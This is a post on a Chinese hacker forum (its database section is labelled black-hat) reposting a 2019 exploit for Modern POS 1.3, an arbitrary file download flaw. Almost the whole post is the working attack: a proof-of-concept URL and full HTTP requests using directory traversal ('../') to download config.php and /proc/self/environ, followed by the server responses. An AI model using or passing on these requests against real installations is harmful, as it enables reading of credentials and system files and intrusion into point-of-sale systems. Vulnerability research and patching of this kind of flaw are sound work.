跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Modern POS 1.3 - Arbitrary File Download

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Modern POS 1.3 - Arbitrary File Download
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://itsolution24.com/
# Software Link: https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
# 

GET /[PATH]/_inc/bridges/php-local/index.php?action=download&path=../../../config.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 23:29:12 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Content-Disposition: attachment; filename="config.php"
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 2920
Content-Type: text/x-php;charset=UTF-8

GET /[PATH]/_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 23:34:27 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Content-Disposition: attachment; filename="environ"
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 0
Content-Type: inode/x-empty

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。